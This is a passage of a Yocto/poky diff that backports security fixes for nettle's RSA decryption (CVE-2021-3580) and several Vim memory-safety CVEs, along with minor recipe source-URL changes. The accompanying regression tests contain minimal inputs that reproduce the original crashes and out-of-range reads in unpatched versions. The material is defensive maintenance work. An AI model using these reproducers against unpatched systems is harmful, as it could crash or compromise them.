+ { + TMP_GMP_DECL (c, mp_limb_t); + TMP_GMP_DECL (ri, mp_limb_t); +@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs + size_t key_limb_size; + int ret; + +- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); ++ key_limb_size = mpz_size(pub->n); + + /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the + key is invalid and rejected by rsa_private_key_prepare. However, +@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs + } + + assert(mpz_size(pub->n) == key_limb_size); +- assert(mn <= key_limb_size); + + TMP_GMP_ALLOC (c, key_limb_size); + TMP_GMP_ALLOC (ri, key_limb_size); + TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key)); + +- rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn); ++ rsa_sec_blind (pub, random_ctx, random, c, ri, m); + +- _rsa_sec_compute_root(key, c, x, scratch); ++ _rsa_sec_compute_root(key, x, c, scratch); + +- ret = rsa_sec_check_root(pub, c, x); ++ ret = rsa_sec_check_root(pub, x, c); + +- rsa_sec_unblind(pub, x, ri, c); ++ rsa_sec_unblind(pub, x, ri, x); + + cnd_mpn_zero(1 - ret, x, key_limb_size); + +@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub + mpz_t x, const mpz_t m) + { + TMP_GMP_DECL (l, mp_limb_t); ++ mp_size_t nn = mpz_size(pub->n); + int res; + +- mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); +- TMP_GMP_ALLOC (l, l_size); ++ TMP_GMP_ALLOC (l, nn); ++ mpz_limbs_copy(l, m, nn); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, +- mpz_limbs_read(m), mpz_size(m)); ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l); + if (res) { +- mp_limb_t *xp = mpz_limbs_write (x, l_size); +- mpn_copyi (xp, l, l_size); +- mpz_limbs_finish (x, l_size); ++ mp_limb_t *xp = mpz_limbs_write (x, nn); ++ mpn_copyi (xp, l, nn); ++ mpz_limbs_finish (x, nn); + } + + TMP_GMP_FREE (l); +Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c ++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c +@@ -19,6 +19,7 @@ test_main(void) + uint8_t after; + + mpz_t gibberish; ++ mpz_t zero; + + rsa_private_key_init(&key); + rsa_public_key_init(&pub); +@@ -101,6 +102,17 @@ test_main(void) + ASSERT(decrypted[decrypted_length] == after); + ASSERT(decrypted[0] == 'A'); + ++ /* Test zero input. */ ++ mpz_init_set_ui (zero, 0); ++ decrypted_length = msg_length; ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, zero)); ++ ASSERT(decrypted_length == msg_length); + + /* Test invalid key. */ + mpz_add_ui (key.q, key.q, 2); +@@ -112,6 +124,6 @@ test_main(void) + rsa_private_key_clear(&key); + rsa_public_key_clear(&pub); + mpz_clear(gibberish); ++ mpz_clear(zero); + free(decrypted); + } +- diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch new file mode 100644 index 0000000000..18e952ddf7 --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch @@ -0,0 +1,163 @@ +From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Tue, 8 Jun 2021 21:32:38 +0200 +Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions. + +(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe) + +Upstream-Status: Backport +CVE: CVE-2021-3580 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 10 +++++++++- + rsa-decrypt-tr.c | 4 ++++ + rsa-decrypt.c | 10 ++++++++++ + rsa-sec-decrypt.c | 4 ++++ + rsa.h | 5 +++-- + testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------ + 6 files changed, 62 insertions(+), 9 deletions(-) + +Index: nettle-3.5.1/rsa-decrypt-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt-tr.c ++++ nettle-3.5.1/rsa-decrypt-tr.c +@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k + mp_size_t key_limb_size; + int res; + ++ /* First check that input is in range. */ ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0) ++ return 0; ++ + key_limb_size = mpz_size(pub->n); + + TMP_GMP_ALLOC (m, key_limb_size); +Index: nettle-3.5.1/rsa-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt.c ++++ nettle-3.5.1/rsa-decrypt.c +@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key + int res; + + mpz_init(m); ++ ++ /* First check that input is in range. Since we don't have the ++ public key available here, we need to reconstruct n. */ ++ mpz_mul (m, key->p, key->q); ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0) ++ { ++ mpz_clear (m); ++ return 0; ++ } ++ + rsa_compute_root(key, m, gibberish); + + res = pkcs1_decrypt (key->size, m, length, message); +Index: nettle-3.5.1/rsa-sec-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sec-decrypt.c ++++ nettle-3.5.1/rsa-sec-decrypt.c +@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_ + TMP_GMP_DECL (em, uint8_t); + int res; + ++ /* First check that input is in range. */ ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0) ++ return 0; ++ + TMP_GMP_ALLOC (m, mpz_size(pub->n)); + TMP_GMP_ALLOC (em, key->size); + +Index: nettle-3.5.1/rsa.h +=================================================================== +--- nettle-3.5.1.orig/rsa.h ++++ nettle-3.5.1/rsa.h +@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_ + size_t length, uint8_t *message, + const mpz_t gibberish); + +-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */ ++/* Compute x, the e:th root of m. Calling it with x == m is allowed. ++ It is required that 0 <= m < n. */ + void + rsa_compute_root(const struct rsa_private_key *key, + mpz_t x, const mpz_t m); + + /* Safer variant, using RSA blinding, and checking the result after +- CRT. */ ++ CRT. It is required that 0 <= m < n. */ + int + rsa_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, +Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c ++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c +@@ -19,11 +19,12 @@ test_main(void) + uint8_t after; + + mpz_t gibberish; +- mpz_t zero; ++ mpz_t bad_input; + + rsa_private_key_init(&key); + rsa_public_key_init(&pub); + mpz_init(gibberish); ++ mpz_init(bad_input); + + knuth_lfib_init(&lfib, 17); + +@@ -103,15 +104,40 @@ test_main(void) + ASSERT(decrypted[0] == 'A'); + + /* Test zero input. */ +- mpz_init_set_ui (zero, 0); ++ mpz_set_ui (bad_input, 0); + decrypted_length = msg_length; +- ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); + ASSERT(!rsa_decrypt_tr(&pub, &key, + &lfib, (nettle_random_func *) knuth_lfib_random, +- &decrypted_length, decrypted, zero)); ++ &decrypted_length, decrypted, bad_input)); + ASSERT(!rsa_sec_decrypt(&pub, &key, + &lfib, (nettle_random_func *) knuth_lfib_random, +- decrypted_length, decrypted, zero)); ++ decrypted_length, decrypted, bad_input)); ++ ASSERT(decrypted_length == msg_length); ++ ++ /* Test input that is slightly larger than n */ ++ mpz_add(bad_input, gibberish, pub.n); ++ decrypted_length = msg_length; ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, bad_input)); ++ ASSERT(decrypted_length == msg_length); ++ ++ /* Test input that is considerably larger than n */ ++ mpz_mul_2exp (bad_input, pub.n, 100); ++ mpz_add (bad_input, bad_input, gibberish); ++ decrypted_length = msg_length; ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, bad_input)); + ASSERT(decrypted_length == msg_length); + + /* Test invalid key. */ +@@ -124,6 +150,6 @@ test_main(void) + rsa_private_key_clear(&key); + rsa_public_key_clear(&pub); + mpz_clear(gibberish); +- mpz_clear(zero); ++ mpz_clear(bad_input); + free(decrypted); + } diff --git a/poky/meta/recipes-support/nettle/nettle_3.5.1.bb b/poky/meta/recipes-support/nettle/nettle_3.5.1.bb index b2ec24b36c..192fd295e9 100644 --- a/poky/meta/recipes-support/nettle/nettle_3.5.1.bb +++ b/poky/meta/recipes-support/nettle/nettle_3.5.1.bb @@ -18,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \ file://Add-target-to-only-build-tests-not-run-them.patch \ file://run-ptest \ file://check-header-files-of-openssl-only-if-enable_.patch \ + file://CVE-2021-3580_1.patch \ + file://CVE-2021-3580_2.patch \ + file://CVE-2021-20305-1.patch \ + file://CVE-2021-20305-2.patch \ + file://CVE-2021-20305-3.patch \ + file://CVE-2021-20305-4.patch \ + file://CVE-2021-20305-5.patch \ " SRC_URI_append_class-target = "\ diff --git a/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb b/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb index 623afccb5e..5f1b73ee16 100644 --- a/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb +++ b/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb @@ -10,7 +10,7 @@ DEPENDS = "libtasn1 libtasn1-native libffi" DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}" -SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23" +SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https" SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb index 7290dc90e5..3401b7b39e 100644 --- a/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb +++ b/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe" SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd" PV .= "+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \ +SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \ " UPSTREAM_VERSION_UNKNOWN = "1" diff --git a/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service b/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service index aaaaa29074..f296a99e1f 100644 --- a/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service +++ b/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service @@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon DefaultDependencies=no After=systemd-udev-settle.service Before=sysinit.target shutdown.target +Wants=systemd-udev-settle.service Conflicts=shutdown.target [Service] diff --git a/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb index b8c6f022f3..58b58fbb3c 100644 --- a/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb +++ b/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS = "sysfsutils" SRC_URI = "\ - git://github.com/nhorman/rng-tools.git \ + git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \ file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \ file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \ file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \ diff --git a/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb index 6b3ebf1cdc..05c7d32965 100644 --- a/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb +++ b/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native" -SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https" +SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master" SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a" PV = "1.15" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch b/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch new file mode 100644 index 0000000000..28c61cd782 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch @@ -0,0 +1,62 @@ +CVE: CVE-2021-3927 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From 93b427c6e729260d0700c3b2804ec153bc8284fa Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Thu, 4 Nov 2021 15:10:11 +0000 +Subject: [PATCH] patch 8.2.3581: reading character past end of line + +Problem: Reading character past end of line. +Solution: Correct the cursor column. +--- + src/ex_docmd.c | 1 + + src/testdir/test_put.vim | 12 ++++++++++++ + src/version.c | 2 ++ + 3 files changed, 15 insertions(+) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index fde726477..59e245bee 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -6905,6 +6905,7 @@ ex_put(exarg_T *eap) + eap->forceit = TRUE; + } + curwin->w_cursor.lnum = eap->line2; ++ check_cursor_col(); + do_put(eap->regname, eap->forceit ? BACKWARD : FORWARD, 1L, + PUT_LINE|PUT_CURSLINE); + } +diff --git a/src/testdir/test_put.vim b/src/testdir/test_put.vim +index 225ebd1f3..922e5b269 100644 +--- a/src/testdir/test_put.vim ++++ b/src/testdir/test_put.vim +@@ -113,3 +113,15 @@ func Test_put_p_indent_visual() + call assert_equal('select that text', getline(2)) + bwipe! + endfunc ++ ++func Test_put_above_first_line() ++ new ++ let @" = 'text' ++ silent! normal 0o00 ++ 0put ++ call assert_equal('text', getline(1)) ++ bwipe! ++endfunc ++ ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index a9e8be0e7..df4ec9a47 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3581, + /**/ + 3564, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch new file mode 100644 index 0000000000..ecfae0301e --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch @@ -0,0 +1,83 @@ +CVE: CVE-2021-3796 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From 1160e5f74b229336502fc376416f21108d36cfc2 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Sat, 11 Sep 2021 21:14:20 +0200 +Subject: [PATCH] patch 8.2.3428: using freed memory when replacing + +Problem: Using freed memory when replacing. (Dhiraj Mishra) +Solution: Get the line pointer after calling ins_copychar(). +--- + src/normal.c | 10 +++++++--- + src/testdir/test_edit.vim | 14 ++++++++++++++ + src/version.c | 2 ++ + 3 files changed, 23 insertions(+), 3 deletions(-) + +diff --git a/src/normal.c b/src/normal.c +index c4963e621..d6333b948 100644 +--- a/src/normal.c ++++ b/src/normal.c +@@ -5009,19 +5009,23 @@ nv_replace(cmdarg_T *cap) + { + /* + * Get ptr again, because u_save and/or showmatch() will have +- * released the line. At the same time we let know that the +- * line will be changed. ++ * released the line. This may also happen in ins_copychar(). ++ * At the same time we let know that the line will be changed. + */ +- ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + if (cap->nchar == Ctrl_E || cap->nchar == Ctrl_Y) + { + int c = ins_copychar(curwin->w_cursor.lnum + + (cap->nchar == Ctrl_Y ? -1 : 1)); ++ ++ ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + if (c != NUL) + ptr[curwin->w_cursor.col] = c; + } + else ++ { ++ ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + ptr[curwin->w_cursor.col] = cap->nchar; ++ } + if (p_sm && msg_silent == 0) + showmatch(cap->nchar); + ++curwin->w_cursor.col; +diff --git a/src/testdir/test_edit.vim b/src/testdir/test_edit.vim +index 4e29e7fe1..f94e6c181 100644 +--- a/src/testdir/test_edit.vim ++++ b/src/testdir/test_edit.vim +@@ -1519,3 +1519,17 @@ func Test_edit_noesckeys() + bwipe! + set esckeys + endfunc ++ ++" Test for getting the character of the line below after "p" ++func Test_edit_put_CTRL_E() ++ set encoding=latin1 ++ new ++ let @" = '' ++ sil! norm orggRx ++ sil! norm pr ++ call assert_equal(['r', 'r'], getline(1, 2)) ++ bwipe! ++ set encoding=utf-8 ++endfunc ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 85bdfc601..1046993d6 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3428, + /**/ + 3409, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch new file mode 100644 index 0000000000..d117a98893 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch @@ -0,0 +1,63 @@ +CVE: CVE-2021-3928 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From ade0f0481969f1453c60e7c8354b00dfe4238739 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Thu, 4 Nov 2021 15:46:05 +0000 +Subject: [PATCH] patch 8.2.3582: reading uninitialized memory when giving + spell suggestions + +Problem: Reading uninitialized memory when giving spell suggestions. +Solution: Check that preword is not empty. +--- + src/spellsuggest.c | 2 +- + src/testdir/test_spell.vim | 8 ++++++++ + src/version.c | 2 ++ + 3 files changed, 11 insertions(+), 1 deletion(-) + +diff --git a/src/spellsuggest.c b/src/spellsuggest.c +index 9d6df7930..8615d5280 100644 +--- a/src/spellsuggest.c ++++ b/src/spellsuggest.c +@@ -1600,7 +1600,7 @@ suggest_trie_walk( + // char, e.g., "thes," -> "these". + p = fword + sp->ts_fidx; + MB_PTR_BACK(fword, p); +- if (!spell_iswordp(p, curwin)) ++ if (!spell_iswordp(p, curwin) && *preword != NUL) + { + p = preword + STRLEN(preword); + MB_PTR_BACK(preword, p); +diff --git a/src/testdir/test_spell.vim b/src/testdir/test_spell.vim +index 79fb8927c..e435e9172 100644 +--- a/src/testdir/test_spell.vim ++++ b/src/testdir/test_spell.vim +@@ -498,6 +498,14 @@ func Test_spell_screendump() + call delete('XtestSpell') + endfunc + ++func Test_spell_single_word() ++ new ++ silent! norm 0R00 ++ spell! ß ++ silent 0norm 0r$ Dvz= ++ bwipe! ++endfunc ++ + let g:test_data_aff1 = [ + \"SET ISO8859-1", + \"TRY esianrtolcdugmphbyfvkwjkqxz-\xEB\xE9\xE8\xEA\xEF\xEE\xE4\xE0\xE2\xF6\xFC\xFB'ESIANRTOLCDUGMPHBYFVKWJKQXZ", +diff --git a/src/version.c b/src/version.c +index df4ec9a47..e1bc0d09b 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3582, + /**/ + 3581, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch new file mode 100644 index 0000000000..58d3442677 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch @@ -0,0 +1,92 @@ +CVE: CVE-2021-3973 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From b6154e9f530544ddc3130d981caae0dabc053757 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Wed, 17 Nov 2021 18:00:31 +0000 +Subject: [PATCH] patch 8.2.3611: crash when using CTRL-W f without finding a + file name Problem: Crash when using CTRL-W f without finding + a file name. Solution: Bail out when the file name length is zero. + +--- + src/findfile.c | 8 ++++++++ + src/normal.c | 6 ++++-- + src/testdir/test_visual.vim | 8 ++++++++ + src/version.c | 2 ++ + 4 files changed, 22 insertions(+), 2 deletions(-) + +diff --git a/src/findfile.c b/src/findfile.c +index dba547da1..5764fd7b8 100644 +--- a/src/findfile.c ++++ b/src/findfile.c +@@ -1727,6 +1727,9 @@ find_file_in_path_option( + proc->pr_WindowPtr = (APTR)-1L; + # endif + ++ if (len == 0) ++ return NULL; ++ + if (first == TRUE) + { + // copy file name into NameBuff, expanding environment variables +@@ -2094,7 +2097,12 @@ find_file_name_in_path( + int c; + # if defined(FEAT_FIND_ID) && defined(FEAT_EVAL) + char_u *tofree = NULL; ++# endif + ++ if (len == 0) ++ return NULL; ++ ++# if defined(FEAT_FIND_ID) && defined(FEAT_EVAL) + if ((options & FNAME_INCL) && *curbuf->b_p_inex != NUL) + { + tofree = eval_includeexpr(ptr, len); +diff --git a/src/normal.c b/src/normal.c +index 7cb959257..f0084f2ac 100644 +--- a/src/normal.c ++++ b/src/normal.c +@@ -3778,8 +3778,10 @@ get_visual_text( + *pp = ml_get_pos(&VIsual); + *lenp = curwin->w_cursor.col - VIsual.col + 1; + } +- if (has_mbyte) +- // Correct the length to include the whole last character. ++ if (**pp == NUL) ++ *lenp = 0; ++ if (has_mbyte && *lenp > 0) ++ // Correct the length to include all bytes of the last character. + *lenp += (*mb_ptr2len)(*pp + (*lenp - 1)) - 1; + } + reset_VIsual_and_resel(); +diff --git a/src/testdir/test_visual.vim b/src/testdir/test_visual.vim +index ae281238e..0705fdb57 100644 +--- a/src/testdir/test_visual.vim ++++ b/src/testdir/test_visual.vim +@@ -894,4 +894,12 @@ func Test_block_insert_replace_tabs() + bwipe! + endfunc + ++func Test_visual_block_ctrl_w_f() ++ " Emtpy block selected in new buffer should not result in an error. ++ au! BufNew foo sil norm f ++ edit foo ++ ++ au! BufNew ++endfunc ++ + " vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 52be3c39d..59a314b3a 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3611, + /**/ + 3582, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch b/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch new file mode 100644 index 0000000000..576664f436 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch @@ -0,0 +1,86 @@ +CVE: CVE-2021-3872 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From 61629ea24a2fff1f89c37479d3fb52f17c3480fc Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Fri, 8 Oct 2021 18:39:28 +0100 +Subject: [PATCH] patch 8.2.3487: illegal memory access if buffer name is very + long + +Problem: Illegal memory access if buffer name is very long. +Solution: Make sure not to go over the end of the buffer. +--- + src/drawscreen.c | 10 +++++----- + src/testdir/test_statusline.vim | 11 +++++++++++ + src/version.c | 2 ++ + 3 files changed, 18 insertions(+), 5 deletions(-) + +diff --git a/src/drawscreen.c b/src/drawscreen.c +index 3a88ee979..9acb70552 100644 +--- a/src/drawscreen.c ++++ b/src/drawscreen.c +@@ -446,13 +446,13 @@ win_redr_status(win_T *wp, int ignore_pum UNUSED) + *(p + len++) = ' '; + if (bt_help(wp->w_buffer)) + { +- STRCPY(p + len, _("[Help]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[Help]")); + len += (int)STRLEN(p + len); + } + #ifdef FEAT_QUICKFIX + if (wp->w_p_pvw) + { +- STRCPY(p + len, _("[Preview]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[Preview]")); + len += (int)STRLEN(p + len); + } + #endif +@@ -462,12 +462,12 @@ win_redr_status(win_T *wp, int ignore_pum UNUSED) + #endif + ) + { +- STRCPY(p + len, "[+]"); +- len += 3; ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", "[+]"); ++ len += (int)STRLEN(p + len); + } + if (wp->w_buffer->b_p_ro) + { +- STRCPY(p + len, _("[RO]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[RO]")); + len += (int)STRLEN(p + len); + } + +diff --git a/src/testdir/test_statusline.vim b/src/testdir/test_statusline.vim +index 1f705b847..91bce1407 100644 +--- a/src/testdir/test_statusline.vim ++++ b/src/testdir/test_statusline.vim +@@ -393,3 +393,14 @@ func Test_statusline_visual() + bwipe! x1 + bwipe! x2 + endfunc ++" Used to write beyond allocated memory. This assumes MAXPATHL is 4096 bytes. ++func Test_statusline_verylong_filename() ++ let fname = repeat('x', 4090) ++ exe "new " .. fname ++ set buftype=help ++ set previewwindow ++ redraw ++ bwipe! ++endfunc ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 1046993d6..2b5de5ccf 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3487, + /**/ + 3428, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch b/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch new file mode 100644 index 0000000000..045081579c --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch @@ -0,0 +1,72 @@ +CVE: CVE-2021-3875 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From b8968e26d7508e7d64bfc86808142818b0a9288c Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Sat, 9 Oct 2021 13:58:55 +0100 +Subject: [PATCH] patch 8.2.3489: ml_get error after search with range + +Problem: ml_get error after search with range. +Solution: Limit the line number to the buffer line count. +--- + src/ex_docmd.c | 6 ++++-- + src/testdir/test_search.vim | 17 +++++++++++++++++ + src/version.c | 2 ++ + 3 files changed, 23 insertions(+), 2 deletions(-) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index fb07450f8..fde726477 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -3586,8 +3586,10 @@ get_address( + + // When '/' or '?' follows another address, start from + // there. +- if (lnum != MAXLNUM) +- curwin->w_cursor.lnum = lnum; ++ if (lnum > 0 && lnum != MAXLNUM) ++ curwin->w_cursor.lnum = ++ lnum > curbuf->b_ml.ml_line_count ++ ? curbuf->b_ml.ml_line_count : lnum; + + // Start a forward search at the end of the line (unless + // before the first line). +diff --git a/src/testdir/test_search.vim b/src/testdir/test_search.vim +index 187671305..e142c3547 100644 +--- a/src/testdir/test_search.vim ++++ b/src/testdir/test_search.vim +@@ -1366,3 +1366,20 @@ func Test_searchdecl() + + bwipe! + endfunc ++ 